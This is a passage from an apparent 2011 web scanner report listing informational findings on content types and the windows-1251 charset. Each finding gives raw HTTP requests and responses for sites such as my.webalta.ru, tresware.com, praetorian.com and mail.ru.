X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2090

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...

31.15. http://my.webalta.ru/feed/l.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.webalta.ru
Path:   /feed/l.php

Request

GET /feed/l.php?url=&id=80 HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:09:20 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.9
Content-Length: 59948

... ...<?xml version="1.0" encoding="utf-8"?><response type="gameboss ver2.0"><result type="games">
<ITEM>
<ID>1093</ID>
<RATE>9999</RATE>
<NAME_URL>vanishing_hitchhiker_rus</NAME_URL>
<TYPE>65</TYP
...[SNIP]...

31.16. http://my.webalta.ru/public/visual/themes/css.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.webalta.ru
Path:   /public/visual/themes/css.php

Request

GET /public/visual/themes/css.php?st=theme1 HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:30:19 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.9
Content-Length: 170

.../* .... .....
*/
.theme_header { background: #7A96A7 url("/public/visual/themes/theme1/top.png"); }

/* .... ....
*/
.theme_body { background: #52677A; }

31.17. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=2208&ref2=elqNone&tzo=360&ms=121 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=8EE1D10DCCE142B68BB195EB59D8F5BA; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 12:52:48 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

31.18. http://www.igotyouremail.com/igye_conversion.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igotyouremail.com
Path:   /igye_conversion.php

Request

GET /igye_conversion.php?pg=Website%20Development%20%7C%20Web%20Content%20Management%20%7C%20CMS%20%7C%20Web%20Design%20%7C%20New%20Jersey%20Custom%20Website%20Development%20%7C%20New%20Jersey%20Website%20Development%20%7C%203D%20Animation%20%7C%20Medical%20Animation&ref=&url=http%3A//www.tresware.com/&gl=&vl=0&s=null&q=null HTTP/1.1
Host: www.igotyouremail.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 12:18:24 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 07 Dec 2010 21:27:20 GMT
ETag: "31f063e-3c8-496d8ab6d1e00"
Accept-Ranges: bytes
Content-Length: 968
Connection: close
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at kelmarkfurnishings.com
</ADDRESS>
</B
...[SNIP]...

31.19. http://www.praetorian.com/contactus.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.praetorian.com
Path:   /contactus.html

Request

GET /contactus.html HTTP/1.1
Host: www.praetorian.com
Proxy-Connection: keep-alive
Referer: http://www.praetorian.com/external-network-penetration-test.html?gclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116139463.1303735969.2.2.utmgclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=116139463.239124078.1303732836.1303732836.1303735969.2; __utmc=116139463; __utmb=116139463.1.10.1303735969

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:09:55 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 17907
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...

31.20. http://www.praetorian.com/external-network-penetration-test.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.praetorian.com
Path:   /external-network-penetration-test.html

Request

GET /external-network-penetration-test.html?gclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ HTTP/1.1
Host: www.praetorian.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116139463.1303732836.1.1.utmgclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=116139463.239124078.1303732836.1303732836.1303732836.1; __utmc=116139463

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:37 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 13262
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
   
...[SNIP]...

31.21. http://www.praetorian.com/images/fieldbg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.praetorian.com
Path:   /images/fieldbg.gif

Request

GET /images/fieldbg.gif HTTP/1.1
Host: www.praetorian.com
Proxy-Connection: keep-alive
Referer: http://www.praetorian.com/contactus.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116139463.1303735969.2.2.utmgclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=116139463.239124078.1303732836.1303732836.1303735969.2; __utmc=116139463; __utmb=116139463.1.10.1303735969

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 13:09:56 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1317
Connection: close
Content-Type: text/html

<HTML>
   <HEAD><TITLE>Page Not Found</TITLE></HEAD>

   <BODY BGCOLOR="#FFFFFF" LINK="maroon" VLINK="maroon"
ALINK="maroon">
   <CENTER>
   <TABLE WIDTH="85%" BORDER="1" BORDERCOLOR="#000000"
CELLSPACING="
...[SNIP]...

31.22. http://www.smpone.com/javascript/common.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /javascript/common.php

Request

GET /javascript/common.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 5596

/*************************************************
   . Copyright 2006 - 2009 Tres Media Group, Inc.
   The code contained within cannot be reproduced
   or modified without the expressed permission o
...[SNIP]...

31.23. http://www.smpone.com/javascript/image_pop.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /javascript/image_pop.php

Request

GET /javascript/image_pop.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2298

// <a href="me.jpg" onclick="return popImage(this.href,'Site author');">link</a>

//really not important (the first two should be small for Opera's sake)
PositionX = 10;
PositionY = 10;
defaultWi
...[SNIP]...

31.24. http://www.smpone.com/javascript/showimages.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /javascript/showimages.php

Request

GET /javascript/showimages.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 317

function showimage() {
   if (!document.images)
       return
       document.images.avatar.src= 'images/Avatars/' + document.Register.av_avatar_pre.options[document.Register.av_avatar_pre.selectedIndex].value
...[SNIP]...

31.25. http://www.tresware.com/javascript/bbcode.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /javascript/bbcode.php

Request

GET /javascript/bbcode.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2394

function x() {
   return;
}

var thisForm;

function mozWrap(txtarea, lft, rgt, pmt, pmr) {
   var selLength = txtarea.textLength;
   var selStart = txtarea.selectionStart;
   var selEnd = txtarea.se
...[SNIP]...

31.26. http://www.tresware.com/javascript/common.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /javascript/common.php

Request

GET /javascript/common.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 1364

/*************************************************
   . Copyright 2006 - 2008 Tres Media Group, Inc.
   The code contained within cannot be reproduced
   or modified without the expressed permission of:
   Tr
...[SNIP]...

31.27. http://www.tresware.com/javascript/edittags.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /javascript/edittags.php

Request

GET /javascript/edittags.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 1561

adminbuttonsFlag = false;
function adminbuttons() {

   var divareas = document.getElementsByTagName('button');
   var editbuttons = new Array();
   for(var i in divareas) {
       if(divareas[i].id) {


...[SNIP]...

31.28. http://www.tresware.com/javascript/image_pop.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /javascript/image_pop.php

Request

GET /javascript/image_pop.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2298

// <a href="me.jpg" onclick="return popImage(this.href,'Site author');">link</a>

//really not important (the first two should be small for Opera's sake)
PositionX = 10;
PositionY = 10;
defaultWi
...[SNIP]...

31.29. http://www.tresware.com/javascript/showimages.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /javascript/showimages.php

Request

GET /javascript/showimages.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 317

function showimage() {
   if (!document.images)
       return
       document.images.avatar.src= 'images/Avatars/' + document.Register.av_avatar_pre.options[document.Register.av_avatar_pre.selectedIndex].value
...[SNIP]...

32. HTML uses unrecognised charset  previous  next
There are 7 instances of this issue:


32.1. http://b2bcontext.ru/services/advertisement/getblock  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://b2bcontext.ru
Path:   /services/advertisement/getblock

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /services/advertisement/getblock?17723897 HTTP/1.1
Host: b2bcontext.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:47:19 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 30189

var b2bctb_id_12402960=b2bctb_rand;var keyg_12402960=new Array();var keyb_12402960=new Array();var b2b_check_urls_dim=[{id:4,atr:"iuuq;00xnnbjm/sv"},{id:8,atr:"iuuq;00xxx/xnnbjm/sv"},{id:12,atr:"iuuq;
...[SNIP]...

32.2. http://ideco-software.ru/products/ims/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://ideco-software.ru
Path:   /products/ims/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /products/ims/?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013 HTTP/1.1
Host: ideco-software.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 14:35:59 GMT
Server: Microsoft-IIS/6.0
Connection: Close
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: dv=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: Query=/products/ims/index.html?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: FirstVisit=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fkdyl055c3sg0uuma045oy45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=windows-1251
Content-Length: 21815

<html><!-- #BeginTemplate "/Templates/main.dwt" --><!-- DW6 -->
<head>
<script type="text/javascript" src="/dropmenu/jquery.js" />
</script>
<script type="text/javascript" src="/dropmenu/hmenu.js"
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<link rel="stylesheet" href="/main.css" type="text/css">
...[SNIP]...

32.3. http://mail.ru/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://mail.ru
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET / HTTP/1.1
Host: mail.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:24:37 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru
Set-Cookie: mrcu=D5824DB584250497422EF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:37 GMT; path=/; domain=.mail.ru
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Sun, 25 Apr 2010 14:24:37 GMT
Last-Modified: Mon, 25 Apr 2011 18:24:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 114440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head
...[SNIP]...
</title>
<meta http-equiv="content-type" content="text/html; charset=windows-1251" />
<meta name="keywords" content="....., .......... ........... ....., ...., ......., ....., ......, ......, .........., ........, ........, ......" />
...[SNIP]...

32.4. http://my.webalta.ru/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://my.webalta.ru
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET / HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:24:42 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Last-Modified: Thu, 28 Oct 2010 08:27:59 GMT
ETag: "15d8003-4d5d-4cc9340f"
Accept-Ranges: bytes
Content-Length: 19805

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

